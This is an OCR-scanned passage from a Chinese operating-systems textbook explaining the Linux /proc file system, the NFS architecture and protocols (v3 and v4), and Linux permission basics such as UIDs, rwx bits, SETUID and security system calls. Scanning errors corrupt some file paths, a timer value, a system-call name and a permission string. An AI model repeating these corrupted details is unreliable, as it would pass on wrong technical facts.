者 仅仅 保存 文件 系统 元 数据 (i 节点 、 超 级 块 、 位 映射 等 ) 改动 的 日 志 。 只 记录 元 数据 会 使 系统 开销 更 
小 ， 性 能 更 好 ， 但 是 不 能 保证 文件 数据 不 会 损坏 。 一 些 其 他 的 日 志文 件 系统 仅仅 维护 关于 元 数据 操作 的 
日 志 (例如 ，SGI 的 XFS)。 

4./proc 文 件 系统 

另 一 个 Linux 文 件 系统 是 /proc (process) 文件 系统 。 其 思想 来 自 于 Bell 实 验 室 开发 的 第 8 版 UNIX ， 
后 来 被 4.4BSD 和 System V 采 用 。 不 过 ，Linux 在 几 个 方面 对 该 思想 进行 了 扩充 。 其 基本 概念 是 为 系统 中 
的 每 个 进程 在 /proc 中 创建 一 个 目录 。 目 录 的 名 字 是 进程 PID 的 十 制 数值 。 例 如 ，/proc/619 是 与 PID 为 619 
的 进程 相对 应 的 目录 。 在 该 目录 下 是 进程 信息 的 文件 ， 如 进程 的 命令 行 、 环 境 变量 和 信号 掩 码 等 。 事 实 
上 ， 这 些 文件 在 磁盘 上 并 不 存在 。 当 读 取 这 些 文件 时 ， 系 统 按 需 从 进程 中 抽取 这 些 信息 ， 并 以 标准 格式 
将 其 返回 给 用 户 。 

许多 Linux 扩 展 与 /proc 中 其 他 的 文件 和 目录 相关 。 它 们 包含 各 种 各 样 的 关于 CPU、 磁 盘 分 区 、 设 备 、 
中 断 向 量 、 内 核 计数 器 、 文 件 系统 、 已 加 载 模块 等 信息 。 非 特权 用 户 可 以 读 取 很 多 这 样 的 信息 ， 于 是 就 
可 以 通过 一 种 安全 的 方式 了 解 系统 的 行为 。 其 中 的 部 分 文件 可 以 被 写 入 ， 以 达到 改变 系统 参数 的 目的 。 


10.6.4 NFS: 网 络 文件 系统 

网 络 在 Linux 中 起 着 重要 作用 ， 在 UNIX 中 也 是 如 此 一 一 自从 网 络 出 现 开始 (第 一 个 UNIX 网 络 是 为 
了 将 新 的 内 核 从 PDP-11/70 转 移 到 Interdata 8/32 上 而 建立 的 )。 本 节 将 考察 Sun Microsystem 的 NFS (网 络 
文件 系统 )。 该 文件 系统 应 用 于 所 有 的 现代 Linux 系 统 中 ， 其 作用 是 将 不 同 计算 机 上 的 不 同文 件 系统 连接 
成 一 个 逻辑 整体 。 当 前 主流 的 NFS 实 现 是 1994 年 提出 的 第 3 版 。NFS 第 4 版 在 2000 年 提出 ， 并 在 前 一 个 
NFS 体 系 结构 上 做 了 一 些 增强 。NFS 有 三 个 方 面值 得 关注 :体系 结构 、 协 议和 实现 。 我 们 现在 将 依次 考 
察 这 三 个 方面 ， 首 先是 简化 的 NFS 第 3 版 ， 然 后 简要 探讨 第 4 版 所 做 的 增强 。 

1. NFS 体 系 结构 

NFS 背 后 的 基本 思想 是 允许 任意 选 定 的 一 些 客户 端 和 服务 器 共享 一 个 公共 文件 系统 。 在 很 多 情况 下 ， 
所 有 的 客户 端 和 服务 器 都 在 同一 个 局 域 网 中 ， 但 这 并 不 是 必需 的 。 如 果 服 务 器 距离 客户 端 很 远 ，NFS 也 
可 以 在 广域网 上 运行 。 简 单 起 见 ， 我 们 还 是 说 客户 端 和 服务 器 ， 就 好 像 它 们 位 于 不 同 的 机 器 上 ， 但 实际 
上 ，NFS 允 许 一 台 机 器 同时 既是 客户 端 又 是 服务 器 。 

每 一 个 NFS 服 务 器 都 导出 一 个 或 多 个 目录 供 远程 客户 端 访问 。 当 一 个 目录 可 用 时 ， 它 的 所 有 子 目录 也 
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都 可 用 ， 因 而 事实 上 ， 整 个 目录 树 通常 作为 一 个 单元 导出 。 服 务 器 导出 的 目录 列表 用 一 个 文件 来 维护 ， 通 
常 是 /etclexports。 因 此 服务 器 启动 后 这 些 目录 可 以 被 自动 地 导出 。 客 户 端 通过 挂 载 这 些 导 出 的 目录 来 访问 
它们 。 当 一 个 客户 端 挂 载 了 一 个 (远程 ) 目录 ， 该 目录 就 成 为 客户 端 目录 层次 的 一 部 分 ， 如 图 10-35 所 示 。 

在 这 个 例子 中 ， 客 户 端 1 将 服务 器 ! 的 bin 目 录 挂 载 到 客户 端 1 自己 的 bin 目 录 。 因 此 它 现在 可 以 用 
/bin/sh 引 用 shell 并 获得 服务 器 的 shell。 无 磁盘 工作 站 通常 只 有 一 个 框架 文件 系统 (在 RAM 中 ) ， 它 从 远 
程 服务 器 中 得 到 所 有 的 文件 ， 就 像 上 例 中 一 样 。 类 似 地 ， 客 户 端 1 将 服务 器 2 中 的 /projects 目 录 挂 载 到 自 
己 的 /usr/ast/work 目 录 ， 因 此 它 用 usr/ast/work/proj1/a 就 可 以 访问 文件 4。 最 后 ， 客 户 端 2 也 挂 载 了 projects 
目录 ， 它 可 以 用 /mnt/proj1/a 访 问 文件 8。 从 这 里 可 以 看 到 ， 由 于 不 同 的 客户 端 将 文件 挂 载 到 各 自 目 录 树 
中 不 同 的 位 置 ， 同 一 个 文件 在 不 同 的 客户 端 有 不 同 的 名 字 。 对 客户 端 来 说 挂 载 点 是 完全 局 部 的 ， 服 务 器 
不 会 知道 文件 在 任何 一 个 客户 端 中 的 挂 载 点 。 


1 号 客户 机 2 号 客户 机 
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1 号 服务 器 2 号 服务 器 
图 10-35 远程 挂 载 的 文件 系统 的 例子 。 图 中 的 方 框 表示 目录 ， 贺 形 表示 文件 


2. NFS 协 议 

由 于 NFS 的 目标 之 一 是 支持 异 构 系统 ， 客 户 端 和 服务 器 可 能 在 不 同 硬件 上 运行 不 同 操作 系统 ， 因 此 
对 客户 端 和 服务 器 之 间 的 接口 给 予 明确 定义 是 很 关键 的 。 只 有 这 样 ， 才 有 可 能 让 任何 一 个 新 的 客户 端 能 
够 跟 现 有 的 服务 器 一 起 正确 工作 ， 反 之 亦 然 。 

NFS 通 过 定义 两 个 客户 端 - 服 务 器 协议 来 实现 这 一 目标 。 一 个 协议 就 是 从 客户 端 发 送 到 服务 器 的 一 
组 请 求 以 及 从 服务 器 返回 给 客户 端的 响应 的 集合 。 

第 一 个 NFS 协 议 处 理 挂 载 。 客 户 端 可 以 向 服务 器 发 送 路 径 名 ， 请 求 服务 器 许可 将 该 目录 挂 载 到 自己 
的 目录 层次 的 某 个 地 方 。 由 于 服务 器 并 不 关心 目录 将 被 挂 载 到 何 处 ， 因 此 请 求 消息 中 并 不 包含 挂 载 地址 。 
如 果 路 径 名 是 合法 的 并 且 该 目录 已 被 导出 ， 那 么 服务 器 向 客户 端 返 回 一 个 文件 句柄 。 这 个 文件 句柄 中 的 
域 惟一 地 标识 了 文件 系统 类 型 、 磁 盘 、 目 录 的 i 节点 号 以 及 安全 信息 等 。 随 后 对 已 挂 载 目录 及 其 子 目 录 
中 文件 的 读 写 都 使 用 该 文件 句柄 。 

Linux 启 动 时 会 在 进入 多 用 户 之 前 运行 shell 脚 本 /etc/rc。 可 以 将 挂 载 远程 文 件 系统 的 命令 写 入 该 脚本 
中 ， 这 样 就 可 以 在 允许 用 户 登录 之 前 自动 挂 载 必要 的 远程 文件 系统 。 此 外 ， 大 部 分 Linux 版 本 也 支持 自 
动 挂 载 。 这 个 特性 允许 一 组 远程 目录 跟 一 个 本 地 目录 相关 联 。 当 客户 端 启动 时 ， 并 不 挂 载 这 些 远程 目 录 
(甚至 不 与 它们 所 在 的 服务 器 进行 联络 )。 相 反 ， 在 第 一 次 打开 远程 文件 时 ， 操 作 系统 向 每 个 服务 器 发 送 
一 条 信息 。 第 一 个 响应 的 服务 器 胜出 ， 其 目录 被 挂 载 。 

相对 于 通过 /ete/re 文 件 进 行 静态 挂 载 ， 自 动 挂 载 具 有 两 个 主要 优势 。 第 一 ， 如 果 /ete/rc 中 列 出 的 某 
个 NFS 服 务 器 出 了 故障 ， 那 么 客户 端 将 无 法 启动 ， 或 者 至 少 会 带 来 一 些 困难 、 延 迟 以 及 很 多 出 错 信 息 。 
如 果 用 户 当前 根本 就 不 需要 这 个 服务 器 ， 那 么 刚才 的 工作 就 白费 了 。 第 二 ， 允 许 客户 端 并 行 地 尝试 一 组 
服务 器 ， 可 以 实现 一 定 程度 的 容错 性 (因为 只 要 其 中 一 个 是 在 运行 的 就 可 以 了 ) ， 而 且 性 能 也 可 以 得 到 
提高 (通过 选择 第 一 个 响应 的 服务 器 一 一 推测 该 服务 器 负载 最 低 ) 。 
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另 一 方面 ， 我 们 默认 在 自动 挂 载 时 所 有 可 选 的 文件 系统 都 是 完全 相同 的 。 由 于 NFS 不 提供 对 文件 或 
目录 复制 的 支持 ， 用 户 需要 自己 确保 所 有 这 些 文件 系统 都 是 相同 的 。 因 此 ， 自 动 挂 载 多 数 情况 下 被 用 于 
包含 系统 代码 的 只 读 文件 系统 和 其 他 很 少 改动 的 文件 。 

第 二 个 NFS 协 议 是 为 访问 目录 和 文件 设计 的 。 客 户 端 可 以 通过 向 服务 器 发 送 消息 来 操作 目录 和 读 写 
文件 。 客 户 端 也 可 以 访问 文件 属性 ， 如 文件 模式 、 大 小 、 上 次 修改 时 间 。NFS 支 持 大 多 数 的 Linux 系 统 
调用 ,但 是 也 许 很 让 人 惊讶 的 是 ，open 和 close 不 被 支持 。 

对 open 和 close 的 省 略 并 不 是 意外 事件 ， 而 纯粹 是 有 意 为 之 。 没 有 必要 在 读 一 个 文件 之 前 先 打 开 它 ， 
也 没有 必要 在 读 完 后 关闭 它 。 读 文件 时 ， 客 户 端 向 服务 器 发 送 一 个 包含 文件 名 的 lookup 消 息 ， 请 求 查询 该 
文件 并 返回 一 个 标识 该 文件 的 文件 句柄 ( 即 包含 文件 系统 标识 符 i 节 点 号 以 及 其 他 数据 ) 。 与 open 调 用 不 同 ， 
lookup 操 作 不 向 系统 内 部 表 中 复制 任何 信息 。read 调 用 包含 要 读 取 的 文件 的 文件 句柄 ， 起 始 偏 移 量 和 需要 
的 字 节 数 。 每 个 这 样 的 消息 都 是 自 包含 的 。 这 个 方案 的 优势 是 在 两 次 read 调 用 之 间 ， 服 务 器 不 需要 记 住 任 
何 关 于 已 打开 的 连接 的 信息 。 因 此 ， 如 果 一 个 服务 器 在 崩溃 之 后 恢复 ， 所 有 关于 已 打开 文件 的 信息 都 不 会 
丢失 ， 因 为 这 些 信息 原本 就 不 存在 。 像 这 样 不 维护 打开 文件 的 状态 信息 的 服务 器 称 作 是 无 状态 的 。 

不 幸 的 是 ，NFS 方 法 使 得 难以 实现 精确 的 Linux 文 件 语义 。 例 如 ， 在 Linux 中 一 个 文件 可 以 被 打开 并 锁定 以 
防止 其 他 进程 对 其 访问 。 当 文件 关闭 时 ， 锁 被 释放 。 在 一 个 像 NFS 这 样 的 无 状态 服务 器 中 ， 锁 不 能 与 已 打开 的 
文件 相关 联 ， 这 是 因为 服务 器 不 知道 哪些 文件 是 打开 的 。 因 此 ，NFS 需 要 -一 个 独立 的 ， 附 加 的 机 制 来 处 理 加 锁 。 

NES 使 用 标准 UNIX 保 护 机 制 ， 为 文件 属 主 、 组 和 其 他 用 户 使 用 读 、 写 、 执 行 位 (rwx bits) (在 第 1 
章 中 提 到 过 ， 将 在 下 面 详细 讨论 ) 。 最 初 ， 每 个 请 求 消息 仅仅 包含 调用 者 的 用 户 ID 和 组 ID，NFS 服 务 器 
用 它们 来 验证 访问 。 实 际 上 ， 它 信任 客户 端 ， 认 为 客户 端 不 会 进行 欺骗 。 若 干 年 来 的 经 验 充分 表明 了 这 
样 一 个 假设 。 现 在 ， 可 以 使 用 公 钥 密码 系统 建立 一 个 安全 密 钥 ， 在 每 次 请 求 和 应 答 中 使 用 它 验证 客户 端 
和 服务 器 。 启 用 这 个 选项 后 ， 恶 意 的 客户 端 就 不 能 伪装 成 另 一 个 客户 端 了 ， 因 为 它 不 知道 其 他 客户 端的 
安全 密 钥 。 

3. NFS 实 现 

尽管 客户 端 和 服务 器 代码 实现 独立 于 NFS 协 议 ， 但 大 多 数 Linux 系 统 使 用 一 个 类 似 图 10-36 所 示 的 三 
层 实现 。 项 层 是 系统 调用 层 ， 这 一 层 处 理 如 open、read 和 close 之 类 的 调用 。 在 解析 调用 和 参数 检查 结 
东 后 ， 调 用 第 二 层 一 一 虚拟 文件 系统 (VFS) Е. 


客户 端 内 核 服务 器 内 核 


v 节 点 
虚拟 文件 系统 层 ооо 


图 10-36 NFS 层 次 结构 
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VFS 层 的 任务 是 维护 一 个 表 ， 每 个 打开 的 文件 在 该 表 中 有 一 个 表 项 。VFS 层 为 每 个 打开 文件 保存 一 
个 虚拟 i 节点 (或 称 为 v-node)。v 节 点 用 来 说 明文 件 是 本 地 文件 还 是 远程 文件 。 对 于 远程 文件 ，v 节 点 提 
供 足够 的 信息 使 客户 端 能 够 访问 它们 。 对 于 本 地 文件 ， 则 记录 其 所 在 的 文件 系统 和 文件 的 i 节点， 这 是 
因为 现代 Linux 系 统 能 支持 多 文件 系统 (例如 ext2fs、/proc、FAT 等 )。 尽 管 VFS 是 为 了 支持 NFS 而 发 明 的 ， 
但 多 数 现代 Linux 系 统 将 VFS 作 为 操作 系统 的 一 个 组 成 部 分 ， 不 管 有 没有 使 用 NFS。 

为 了 理解 如 何 使 用 v 节 点 ， 我 们 来 跟踪 一 组 顺序 执行 的 mount，open 和 read 调 用 。 要 挂 载 一 个 远程 
文件 系统 ， 系 统管 理 员 (或 /etc/re) 调用 mount 程 序 ， 并 指明 远程 目录 、 远 程 目录 将 被 挂 载 到 哪个 本 地 目 
录 ， 以 及 其 他 信息 。mount 程 序 解析 要 被 挂 载 的 远程 目录 并 找到 该 目录 所 在 的 NFS 服 务 器 ， 然 后 与 该 机 
器 连接 ， 请 求 远程 目录 的 文件 句柄 。 如 果 该 目录 存在 并 可 被 远程 挂 载 ， 服 务 器 就 返回 一 个 该 目录 的 文件 
句柄 。 最 后 ，mount 程 序 调 用 mount 系 统 调用 ， 将 该 句柄 传递 给 内 核 。 

然后 内 核 为 该 远程 目录 创建 一 个 v 节 点 ， 并 要 求 客户 端 代码 (图 10-36 所 示 ) 在 其 内 部 表 中 创建 一 个 
[节点 (remote i-node) 来 保存 该 文件 句柄 。v 节 点 指向 r 节 点 。VFS 中 的 每 一 个 v 节 点 最 终 要 么 包含 一 个 
指向 NFS 客 户 端 代码 中 r 节 点 的 指针 ， 要 么 包含 指向 一 个 本 地 文件 系统 的 i 节 点 的 指针 (在 图 10-36 中 用 虚 
线 标 出 )。 因 此 ， 我 们 可 以 从 v 节 点 中 判断 一 个 文件 或 目录 是 本 地 的 还 是 远程 的 。 如 果 是 本 地 的 ， 可 以 定 
位 相应 的 文件 系统 和 i 节 点 。 如 果 是 远程 的 ， 可 以 找到 远程 主机 和 文件 句柄 。 

当 客户 端 打开 一 个 远程 文件 时 ， 在 解析 路 径 名 的 某 个 时 刻 , 内 核 会 磁 到 挂 载 了 远程 文件 系统 的 目录 。 
内 核 看 到 该 目录 是 远程 的 ， 并 从 该 目录 的 v 节 点 中 找到 指向 r 节 点 的 指针 ， 然 后 要 求 NFS 客 户 端 代码 打 开 
文件 。NFS 客 户 端 代码 在 与 该 目录 关联 的 远程 服务 器 上 查询 路 径 名 中 剩余 的 部 分 ， 并 返回 一 个 文件 句柄 。 
它 在 自己 的 表 中 为 该 远程 文件 创建 一 个 r 节 点 并 报告 给 VFS 层 。VFS 层 在 自己 的 表 中 为 该 文件 建立 一 个 指 
向 该 r 节 点 的 v 节 点 。 从 这 里 我 们 再 一 次 看 到 ， 每 一 个 打开 的 文件 或 目录 有 一 个 v 节 点 ， 要 么 指向 一 个 r 节 
点 ， 要 么 指向 一 个 i 节 

返回 给 调用 者 的 是 远程 文件 的 一 个 文件 描述 符 。VFS 层 中 的 表 将 该 文件 描述 符 映射 到 v 节 点 。 注 意 ， 
服务 器 端 没有 创建 任何 表 项 。 尽 管 服务 器 已 经 准备 好 在 收 到 请 求 时 提供 文件 句柄 ， 但 它 并 不 记录 哪些 文 
件 有 文件 句柄， 哪些 文件 没有 。 当 一 个 文件 句柄 发 送 过 来 要 求 访问 文件 时 ， 它 检查 该 句柄 。 如 果 是 有 效 
的 句柄 ， 就 使 用 它 。 如 果 安全 策略 被 启用 ， 验 证 包含 对 RPC 头 中 的 认证 密 钥 的 检验 。 

当 文 件 描述 符 被 用 于 后 续 的 系统 调用 〈 例 如 read) 时 ，VFS 县 先 定位 相应 的 v 节 点 ， 然 后 根据 它 确 
定 文件 是 本 地 的 还 是 远程 的 ， 同 时 确定 哪个 ;节点 或 [节点 是 描述 该 文件 的 。 然 后 向 服务 器 发 送 一 个 消息 ， 
该 消息 包含 句柄 、 偏 移 量 (由 客户 端 维持 ， 而 不 是 服务 器 端 ) 和 字 节 数 。 出 于 效率 方面 的 考虑 ， 即 使 要 
传输 的 数据 很 少 ， 客 户 端 和 服务 器 之 间 的 数据 传输 也 使 用 大 数据 块 ， 通 常 是 8192 字 节 。 

当 请 求 消息 到 达 服 务 器 ， 它 被 送 到 服务 器 的 VFS 县 ， 在 那里 将 判断 所 请 求 的 文件 在 哪个 本 地 文件 系 
统 中 。 然 后 ，VFS 层 调用 本 地 文件 系统 去 读 取 并 返回 请 求 的 字 节 。 随 后 ， 这 些 数据 被 传送 给 客户 端 。 客 
户 端 的 VFS 层 接收 到 它 所 请 求 的 这 个 8KB 块 之 后 ， 又 自动 发 出 对 下 一 个 块 的 请 求 ， 这 样 当 我 们 需要 下 一 
个 块 时 就 可 以 很 快 地 得 到 。 这 个 特性 称 为 预 读 (read ahead) ， 它 极 大 地 提高 了 性 能 。 

客户 端 向 服务 器 写 文件 的 过 程 是 类 似 的 。 文 件 也 是 以 8KB 块 为 单位 传输 。 如 果 一 个 write 系 统 调用 提 
供 的 数据 少 于 8KB， 则 数据 在 客户 端 本 地 累积 ， 直 到 达到 8KB 时 才 发 送 给 服务 器 。 当 然 ， 当 文 件 关闭 时 ， 
所 有 的 数据 都 立即 发 送 给 服务 器 。 

另 一 个 用 来 改善 性 能 的 技术 是 缓存 ， 与 在 通常 的 UNIX 系 统 中 的 用 法 一 样 。 服 务 器 缓存 数据 以 避免 
磁盘 访问 ， 但 这 对 客户 端 而 言 是 不 可 见 的 。 客 户 端 维护 两 个 缓存 ; 一 个 缓存 文件 属性 (i 节 点 )， 另 一 个 
缓存 文件 数据 。 当 需要 i 节 点 或 文件 块 时 ， 就 在 缓存 中 检查 有 无 符合 的 数据 。 如 果 有 ， 就 可 以 避免 网 络 
流量 了 。 

客户 端 缓存 对 性 能 提升 起 到 很 大 帮助 的 同时 ， 也 带 来 了 一 些 令 人 讨厌 的 问题 。 假设 两 个 客户 端 都 组 
存 了 同一 个 文件 块 ， 并 且 其 中 一 个 客户 端 修改 了 它 。 当 另 一 个 客户 读 该 块 时 ， 它 读 到 的 是 旧 的 数据 值 。 
这 时 缓存 是 不 一 致 的 。 

考虑 到 这 个 问题 可 能 带 来 的 严重 性 后 果 ，NFS 实 现 做 了 -一些 事情 来 缓解 这 一 问题 。 第 一 ， 为 每 个 组 
存 了 的 块 关联 一 个 定时 器 。 当 定时 器 到 期 时 ， 缓 存 的 项 目 就 被 丢弃 。 通 常 ， 数据 块 的 时 间 是 3 种， 目录 
块 的 时 间 是 30 秒 。 这 稍微 减少 了 一 些 风险 。 另 外 ， 当 打开 一 个 有 缓存 的 文件 时 ， 会 向 服务 器 发 送 -个 消 
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息 来 找 出 文件 最 后 修改 的 时 间 。 如 果 最 后 修改 时 间 晚 于 本 地 缓存 时 间 ， 那 么 旧 的 副本 被 丢弃 ， 新 副本 从 
服务 器 取 回 。 最 后 ， 每 30 秒 缓存 定时 器 到 期 一 次 ,缓存 中 所 有 的 “ 肤 ” 块 ( 即 修改 过 的 块 ) 都 发 送 到 服 
务 器 。 尽 管 并 不 完美 ， 但 这 些 修补 使 得 系统 在 多 数 实际 环境 中 高 度 可 用 。 

4. NFS 第 4 版 

网 络 文件 系统 第 4 版 是 为 了 简化 其 以 前 版 本 的 一 些 操作 而 设计 的 。 相 对 于 上 面 描述 的 第 3 版 NFS， 
第 4 版 NFS 是 有 状态 的 文件 系统 。 这 样 就 记 许 对 远程 文件 调用 open 操 作 ， 因 为 远程 NFS 服 务 器 将 维护 包 
括 文件 指针 在 内 的 所 有 文件 系统 相关 的 结构 。 读 操作 不 再 需要 包含 绝对 读 取 范 围 了 ， 而 可 以 从 文件 指针 
上 次 所 在 的 位 置 开 始 增加 。 这 就 使 消息 变 短 ， 同 时 可 以 在 一 次 网 络 传输 中 捆绑 多 个 第 3 版 NFS 的 操作 。 

第 4 版 NFS 的 有 状态 性 使 得 将 第 3 版 NFS 中 多 个 协议 (在 本 节 前 面部 分 描述 过 ) 集成 为 一 个 一 致 的 协 
议 变 得 容易 。 这 样 就 没有 必要 再 为 挂 载 、 缓 存 、 加 锁 或 者 安全 操作 支持 单独 的 协议 了 。 第 4 版 NFS 在 
Linux (和 UNIX) 和 Windows 文 件 系统 语义 下 都 工作 得 更 好 。 


10.7 Linux 的 安全 性 
Linux 作 为 MINIX 和 UNIX 的 复制 品 ， 几 乎 从 一 开始 就 是 一 个 多 用 户 系统 。 这 段 历 史 意味 着 Linux 从 
早期 开始 就 建立 了 安全 和 信息 访问 控制 。 在 接 下 来 的 几 节 里 ， 我 们 将 关注 Linux 安全 性 的 一 些 方面 。 


10.7.1 基本 概念 

一 个 Linux 系 统 的 用 户 群体 由 一 定数 量 的 注册 用 户 组 成 ， 其 中 每 个 用 户 拥有 一 个 惟一 的 UID (A P 
1D)。UID 是 介 于 0 到 65 535 之 间 的 一 个 整数 。 文 件 (进程 及 其 他 资源 ) 都 标记 了 它 的 所 有 者 的 UID。 尽 
管 可 以 改变 文件 所 有 权 ， 但 是 默认 情况 下 ， 文 件 的 所 有 者 是 创建 该 文件 的 用 户 。 

用 户 可 以 被 分 组 ， 其 中 每 组 同样 由 一 个 16 位 的 整数 标记 ， 叫 做 GID (组 ID)。 给 用 户 分 组 通过 在 系 
统 数据 库 中 添加 一 条 记录 指明 哪个 用 户 属于 哪个 组 的 方法 手工 〈 由 系统 管理 员 ) 完成 。 一 个 用 户 可 以 同 
时 属于 多 个 组 。 为 简单 起 见 ， 我 们 不 再 深入 讨论 这 个 问题 。 

Linux 中 的 基本 安全 机 制 很 简单 。 每 个 进程 记录 它 的 所 有 者 的 UID 和 GID。 当 一 个 文件 被 创建 时 ， 它 
的 UID 和 GID 被 标记 为 创建 它 的 进程 的 UID 和 GID。 该 文件 同时 获得 由 该 进程 决定 的 一 些 权限 。 这 些 权限 
指定 所 有 者 、 所 有 者 所 在 组 的 其 他 用 户 及 其 他 用 户 对 文件 具有 什么 样 的 访问 权限 。 对 于 这 三 类 用 户 而 计 
潜在 的 访问 权限 为 读 、 写 和 执行 ， 分 别 由 r，、w 和 x 标 记 。 当 然 ， 执行 文件 的 权限 仅 当 文件 是 可 执行 二 进 
制程 序 时 才 有 意义 。 试 图 执行 一 个 拥有 执行 权限 的 非 可 执行 文件 ( 即 ， 并 非 由 一 个 合法 的 文件 头 开始 的 
文件 ) 会 导 臻 错误。 因为 有 三 类 用 户 ， 每 类 用 户 的 权限 由 3 个 比特 位 标记 ， 那 么 9 个 比特 位 就 是 够 标记 访 
间 权 限 。 图 10-37 给 出 了 一 些 9 位 数字 及 其 含义 的 例子 : 


= ж 多 许 的 文件 访问 权限 

111000000 所 有 者 可 以 读 、 写 和 执行 

111111000 所 有 者 和 组 可 以 读 、 写 和 执行 

| 110100000 | 所 有 者 可 以 读 和 写 , 组 可 以 读 q 
110100100 所 有 者 可 以 读 和 写 ， 其 他 人 可 以 读 
111101101 所 有 者 拥有 所 有 权限 ， 其 他 人 可 以 读 和 执行 
000000000 所 有 人 部 不 拥有 任何 权限 
000000111 只 有 组 以 外 的 其 他 用 户 拥有 所 有 权限 奇怪 但 是 合法 


图 10-37 文件 保护 模式 的 例子 

图 10-37 前 两 行 的 意思 很 清楚 ， 人 允许 所 有 者 以 及 与 所 有 者 同 组 的 人 所 有 权限 。 接 下 来 的 一 行 允许 所 
有 者 同 组 用 户 读 权限 但 是 不 可 以 改变 其 内 容 ， 而 其 他 用 户 没有 任何 权限 。 第 四 行 通常 用 于 所 有 者 想 要 公 
开 的 数据 文件 。 类 似 地 ， 第 五 行 通常 用 于 所 有 者 想 要 公开 的 程序 。 第 六 行 剥夺 了 所 有 用 户 的 任何 权利 。 
这 种 模式 有 时 用 于 伪 文件 来 实现 相互 排斥 ， 因 为 想 要 创建 一 个 同名 的 文件 的 任何 行为 都 将 失败 。 如 果 多 
个 进程 同时 想 要 创建 这 样 一 个 文件 作为 锁 ， 那 么 只 有 一 个 能 够 创建 成 功 。 最 后 一 个 例子 相当 奇怪 ， 因 为 
它 给 组 以 外 其 他 用 户 更 多 的 权限 。 但 是 ， 它 的 存在 是 符合 保护 规则 的 。 幸运 的 是 ， 尽 管 没有 任何 文件 访 
问 权限 ， 但 是 所 有 者 可 以 随后 改变 保护 模式 。 
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UID 为 0 的 用 户 是 一 个 特殊 用 户 ， 称 为 超级 用 户 (或 者 根 用 户 )。 超 级 用 户 能 够 读 和 写 系统 中 的 任何 
文件 ， 不 论 这 个 文件 为 谁 所 有 ， 也 不 论 这 个 文件 的 保护 模式 如 何 。UID 为 0 的 进程 拥有 调用 一 小 部 分 受 
保护 的 系统 调用 的 权限 ， 而 普通 用 户 是 不 能 调用 这 些 系统 调用 的 。 一 般 而 言 ， 只 有 系统 管理 员 知道 超级 
用 户 的 密码 ， 但 是 很 多 学 生 寻 找 系统 安全 漏洞 想 让 自己 能 够 不 用 密码 就 可 以 以 超级 用 户 的 身份 登录 ， 并 
且 认 为 这 是 一 种 了 不 起 的 行为 。 管 理 人 员 往 往 对 这 种 行为 很 不 满 。 

目录 也 是 一 种 文件 ， 并 且 具 有 普通 文件 一 样 的 保护 模式 。 不 同 的 是 ， 目 录 的 x 比 特 位 表示 查找 权限 
而 不 是 执行 权限 。 因 此 ， 如 果 一 个 目录 具有 保护 模式 rwxr-xr-x， 那 么 它 允 许 所 有 者 读 、 写 和 查找 目录 ， 
但 是 其 他 人 只 可 以 读 和 查找 ， 而 不 允许 从 中 添加 或 者 删除 文件 。 

与 1O 相 关 的 特殊 文件 拥有 与 普通 文件 一 样 的 保护 位 。 这 种 机 制 可 以 用 来 限制 对 LO 设备 的 访问 权限 。 
例如 ,假设 打印 机 特殊 文件 ，/dev/lp， 可 以 被 根 用 户 或 者 一 个 叫 守护 进程 的 特殊 用 户 拥有 ， 具 有 保护 模 
式 rw--…---， 从 而 阻止 其 他 所 有 人 对 打印 机 的 访问 权限 。 毕 竟 ， 如 果 每 个 人 都 可 以 任意 使 用 打印 机 ， 那 
么 就 会 发 生 混乱 。 

当然 ， 让 /dev/lp 被 守护 进程 以 保护 模式 rw------- 拥有 ， 意 味 着 其 他 任何 人 都 不 可 以 使 用 打印 机 ， 但 
是 这 种 做 法 限制 了 很 多 合法 的 打印 要 求 。 事 实 上 ， 人 允许 对 1/O 设 备 及 其 他 系统 资源 进行 受 控 访问 的 做 法 
具有 一 个 更 普遍 的 问题 。 

这 个 问题 通过 增加 一 个 保护 位 SETUID 到 之 前 的 9 个 比特 位 来 解决 。 当 一 个 进程 的 SETUID 位 打开 ， 
它 的 有 效 UID 将 变 成 相应 可 执行 文件 的 所 有 者 的 UID， 而 不 是 当前 使 用 该 进程 的 用 户 的 UID。 当 一 个 进 
程 试图 打开 一 个 文件 时 ， 系 统 检查 的 将 是 它 的 有 效 UID， 而 不 是 真正 的 UID。 将 访问 打印 机 的 程序 设置 
为 被 守护 进程 所 有 ， 同 时 打开 SETUID 位 ， 这 样 任何 用 户 都 可 以 执行 该 程序 ， 并 拥有 守护 进程 的 权限 
(例如 访问 /dep/tp) ， 但 是 这 仅 限于 运行 该 程序 (例如 给 打印 任务 排序 )。 

许多 敏感 的 Linux 程 序 被 根 用 户 所 有 ， 但 是 打开 它们 的 SETUID 位 。 例 如 ， 允许 用 户 改变 密码 的 程序 
需要 写 password 文 件 。 允 许 password 文 件 公开 可 写 显然 不 是 个 好 主意 。 解 决 的 方法 是 ， 提供 一 个 被 根 用 
户 所 有 同时 SETUID 位 打开 的 程序 。 虽 然 该 程序 拥有 对 password 文 件 的 全 部 权限 ， 但 是 它 仅仅 改变 调用 
该 程序 的 用 户 的 密码 ， 而 不 允许 其 他 任何 的 访问 权限 。 

除了 SETUID 位 ， 还 有 一 个 SETGID 位 ， 工 作 原 理 同 SETUID 类 似 。 它 暂时 性 地 给 用 户 该 程序 的 有 效 
GID。 然 而 在 实践 中 ， 这 个 位 很 少 用 到 。 

10.7.2 Linux 中 安全 相关 的 系统 调用 

只 有 为 数 不 多 的 几 个 安全 性 相关 的 系统 调用 。 其 中 最 重要 的 几 个 在 图 10-38 中 列 出 。 最 常用 到 的 安 
全 相关 的 系统 调用 是 chmod。 它 用 来 改变 保护 模式 。 例 如 : 

s=chmod("/usr/ast/newgame",0755); 


它 把 newgame 文 件 的 保护 模式 修改 为 rwxrxr-x， 这 样 任何 人 都 可 以 运行 该 程序 (0755 是 -- 个 八进制 常数 ， 


这 样 表示 很 方便 ， 


保护 位 每 三 个 分 为 一 组 )。 只 有 该 文件 的 所 有 者 和 超级 用 户 才 有 权利 改变 保护 模式 。 


系统 调用 а ж 
5 = chmod(path, mode) 改变 文件 的 保护 模式 
з = access(path, mode) 使 用 真实 的 UID 和 GID 测 试 访问 权限 
uid = getuid( ) 获取 真实 的 UID 
uid = деіешо( ) 获取 有 效 UID 
gid=getgid() _ 获取 真实 的 GID 
gid = getegid( ) i 获取 有 效 GID 
S = chown(path, owner, group) | 改变 所 有 者 和 组 
s = setuid(uid) 设置 UID 
S = setgid(gid) 设置 GID 


图 10-38 一 些 与 安全 相关 的 系统 调用 。 当 错误 发 生 时 ， 返 回 值 s 为 1， 


uid 和 gid 分 别 是 UID 和 GID。 参 数 的 意思 不 言 自明 
